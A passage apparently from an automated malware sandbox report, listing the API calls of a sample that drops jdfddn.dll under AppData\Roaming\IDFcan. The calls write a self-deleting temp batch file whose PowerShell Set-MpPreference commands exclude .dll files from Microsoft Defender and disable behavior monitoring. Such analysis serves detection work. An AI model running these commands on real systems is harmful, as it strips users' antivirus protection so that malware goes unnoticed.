                                                                0x00401edc
                                                                0x00401eeb
                                                                0x00401efa
                                                                0x00401f09
                                                                0x00401f18
                                                                0x00401f1d
                                                                0x00401f2e
                                                                0x00401f3b
                                                                0x00401f3d
                                                                0x00401f4a
                                                                0x00401f4b
                                                                0x00401f51
                                                                0x00401f56
                                                                0x00401f61
                                                                0x00401f67
                                                                0x00401f6e
                                                                0x00401f78
                                                                0x00401f7f
                                                                0x00401f86
                                                                0x00401f8d
                                                                0x00401f94
                                                                0x00401fa0
                                                                0x00401fa0
                                                                0x00000000
                                                                0x00401f3b
                                                                0x00401e54
                                                                0x00401ce6
                                                                0x00401cbe

                                                                APIs
                                                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91), ref: 00401BB1
                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,\IDFcan), ref: 00401BC1
                                                                • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,00000000,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,\IDFcan), ref: 00401BCD
                                                                • lstrcpyA.KERNEL32(C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,00000000,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,\IDFcan), ref: 00401C27
                                                                • GetModuleHandleA.KERNEL32(kernel32,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,00000000,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,\IDFcan), ref: 00401CA4
                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00401CB7
                                                                • GetCurrentProcess.KERNEL32(00000000,IsWow64Process,kernel32,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,00000000,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,\IDFcan), ref: 00401CCF
                                                                • GetTempPathA.KERNEL32(000001F4,C:\Users\user\AppData\Local\Temp\oh161a161.bat), ref: 00401CFD
                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\oh161a161.bat,7sr48er48,000001F4,C:\Users\user\AppData\Local\Temp\oh161a161.bat), ref: 00401E64
                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\oh161a161.bat,.bat,C:\Users\user\AppData\Local\Temp\oh161a161.bat,7sr48er48,000001F4,C:\Users\user\AppData\Local\Temp\oh161a161.bat), ref: 00401E73
                                                                • lstrcatA.KERNEL32(oh161a161.bat,.bat,C:\Users\user\AppData\Local\Temp\oh161a161.bat,.bat,C:\Users\user\AppData\Local\Temp\oh161a161.bat,7sr48er48,000001F4,C:\Users\user\AppData\Local\Temp\oh161a161.bat), ref: 00401E82
                                                                • lstrcpyA.KERNEL32(echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,echo timeout 3 > ,oh161a161.bat,.bat,C:\Users\user\AppData\Local\Temp\oh161a161.bat,.bat,C:\Users\user\AppData\Local\Temp\oh161a161.bat,7sr48er48,000001F4,C:\Users\user\AppData\Local\Temp\oh161a161.bat), ref: 00401E91
                                                                • lstrcatA.KERNEL32(echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,echo timeout 3 > ,oh161a161.bat,.bat,C:\Users\user\AppData\Local\Temp\oh161a161.bat,.bat,C:\Users\user\AppData\Local\Temp\oh161a161.bat,7sr48er48,000001F4,C:\Users\user\AppData\Local\Temp\oh161a161.bat), ref: 00401EA0
                                                                • lstrcatA.KERNEL32(echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,echo powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> ,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,echo timeout 3 > ,oh161a161.bat,.bat,C:\Users\user\AppData\Local\Temp\oh161a161.bat,.bat,C:\Users\user\AppData\Local\Temp\oh161a161.bat,7sr48er48,000001F4,C:\Users\user\AppData\Local\Temp\oh161a161.bat), ref: 00401EAF
                                                                • lstrcatA.KERNEL32(echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,echo powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> ,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,echo timeout 3 > ,oh161a161.bat,.bat,C:\Users\user\AppData\Local\Temp\oh161a161.bat,.bat,C:\Users\user\AppData\Local\Temp\oh161a161.bat,7sr48er48,000001F4,C:\Users\user\AppData\Local\Temp\oh161a161.bat), ref: 00401EBE
                                                                • lstrcatA.KERNEL32(echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,echo exit >> ,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,echo powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> ,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,echo timeout 3 > ,oh161a161.bat,.bat,C:\Users\user\AppData\Local\Temp\oh161a161.bat,.bat,C:\Users\user\AppData\Local\Temp\oh161a161.bat,7sr48er48), ref: 00401ECD
                                                                • lstrcatA.KERNEL32(echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,echo exit >> ,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,echo powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> ,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,echo timeout 3 > ,oh161a161.bat,.bat,C:\Users\user\AppData\Local\Temp\oh161a161.bat,.bat), ref: 00401EDC
                                                                • lstrcatA.KERNEL32(echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,start /min ,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,echo exit >> ,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,echo powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> ,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,echo timeout 3 > ,oh161a161.bat,.bat), ref: 00401EEB
                                                                • lstrcatA.KERNEL32(echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,start /min ,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,echo exit >> ,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,echo powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> ,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min 
oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,echo timeout 3 > ), ref: 00401EFA
                                                                • lstrcatA.KERNEL32(echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,0043F701,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,start /min ,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,echo exit >> ,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,echo powershell.exe Set-MpPreference -ExclusionExtension dll ; 
Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> ,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat), ref: 00401F09
                                                                • lstrcatA.KERNEL32(echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,C:\Users\user\AppData\Local\Temp\oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,0043F701,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,start /min ,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,echo exit >> ,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > 
oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,echo powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> ), ref: 00401F18
                                                                • lstrcatA.KERNEL32(echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,",echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,C:\Users\user\AppData\Local\Temp\oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,0043F701,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,start /min ,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,echo exit >> ,echo timeout 3 > oh161a161.batecho 
powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat), ref: 00401F2E
                                                                • lstrlenA.KERNEL32(echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,00000000,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,",echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,C:\Users\user\AppData\Local\Temp\oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,0043F701,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,start /min ,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho 
powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,echo exit >> ), ref: 00401F45
                                                                • _lwrite.KERNEL32(00000000,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,00000000,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,00000000,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,",echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,C:\Users\user\AppData\Local\Temp\oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,0043F701,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,start /min ,echo timeout 3 > oh161a161.batecho 
powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te), ref: 00401F51
                                                                • CloseHandle.KERNEL32(00000000,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,00000000,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,00000000,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,",echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,C:\Users\user\AppData\Local\Temp\oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,0043F701,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,oh161a161.bat,echo timeout 3 > oh161a161.batecho powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te,start /min ,echo timeout 3 > oh161a161.batecho 
powershell.exe Set-MpPreference -ExclusionExtension dll ; Set-MpPreference -DisableBehaviorMonitoring $true ; exit >> oh161a161.batecho exit >> oh161a161.batstart /min oh161a161.batdel "C:\Users\user\AppData\Local\Te), ref: 00401F56
